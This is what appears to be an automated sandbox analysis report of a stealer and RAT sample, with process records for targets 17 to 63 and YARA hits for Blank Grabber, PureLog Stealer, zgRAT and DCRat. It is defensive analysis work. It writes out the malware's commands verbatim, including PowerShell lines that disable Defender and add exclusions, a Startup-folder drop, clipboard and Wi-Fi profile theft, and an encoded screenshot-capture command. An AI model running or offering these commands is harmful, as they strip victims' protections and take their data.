MD5 hash:	10D45FBCAC1C3CCF126754680E91E0E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000010.00000003.1795412848.0000014703693000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000010.00000003.1795412848.0000014703695000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 51%, ReversingLabs Detection: 47%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	04:57:16
Start date:	01/08/2024
Path:	C:\ProgramData\Microsoft\based.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\based.exe"
Imagebase:	0x7ff601510000
File size:	6'171'507 bytes
MD5 hash:	10D45FBCAC1C3CCF126754680E91E0E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	04:57:17
Start date:	01/08/2024
Path:	C:\ProgramData\Microsoft\hacn.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\hacn.exe"
Imagebase:	0x7ff6d55d0000
File size:	11'662'615 bytes
MD5 hash:	FC445049713C02F9A9DDAA62E404C9E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	04:57:18
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	04:57:18
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:57:18
Start date:	01/08/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
Imagebase:	0x550000
File size:	6'361'390 bytes
MD5 hash:	E5DB23B3AAF4DDDD2BAF96FB7BBA9616
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000015.00000003.1830651243.0000000007241000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	04:57:20
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	04:57:20
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	04:57:20
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	04:57:20
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	04:57:20
Start date:	01/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	04:57:20
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	04:57:20
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	04:57:20
Start date:	01/08/2024
Path:	C:\ProgramData\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\svchost.exe"
Imagebase:	0x660000
File size:	4'042'529 bytes
MD5 hash:	45C59202DCE8ED255B4DBD8BA74C630F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000003.1841385534.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000003.1839390909.0000000005600000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\svchost.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs Detection: 53%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	04:57:20
Start date:	01/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	04:57:21
Start date:	01/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	04:57:22
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	04:57:22
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: SIHClient.exePID: 7396, Parent PID: 3584

General

Target ID:	34
Start time:	04:57:22
Start date:	01/08/2024
Path:	C:\Windows\System32\SIHClient.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\sihclient.exe /cv qGOEROT6yEajSrP7aJ1lsw.0.2
Imagebase:	0x7ff617a20000
File size:	380'720 bytes
MD5 hash:	8BE47315BF30475EEECE8E39599E9273
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	04:57:22
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	04:57:22
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	04:57:23
Start date:	01/08/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Imagebase:	0xc60000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	04:57:23
Start date:	01/08/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff645830000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	04:57:23
Start date:	01/08/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff645830000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	04:57:25
Start date:	01/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	04:57:25
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	04:57:25
Start date:	01/08/2024
Path:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Imagebase:	0x300000
File size:	3'720'704 bytes
MD5 hash:	5FE249BBCC644C6F155D86E8B3CC1E12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002A.00000000.1886461269.0000000000302000.00000002.00000001.01000000.00000029.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002A.00000002.2525882233.0000000012AFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	04:57:26
Start date:	01/08/2024
Path:	C:\ProgramData\setup.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\setup.exe"
Imagebase:	0x7ff799470000
File size:	5'617'152 bytes
MD5 hash:	1274CBCD6329098F79A3BE6D76AB8B97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs Detection: 79%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	04:57:26
Start date:	01/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	04:57:26
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	04:57:28
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	04:57:28
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	04:57:28
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	04:57:28
Start date:	01/08/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff7360c0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	04:57:31
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	04:57:33
Start date:	01/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	04:57:34
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	04:57:34
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	04:57:34
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	04:57:34
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	04:57:34
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	04:57:34
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	04:57:35
Start date:	01/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff750d20000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	04:57:35
Start date:	01/08/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff645830000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	04:57:37
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	63
Start time:	04:57:37
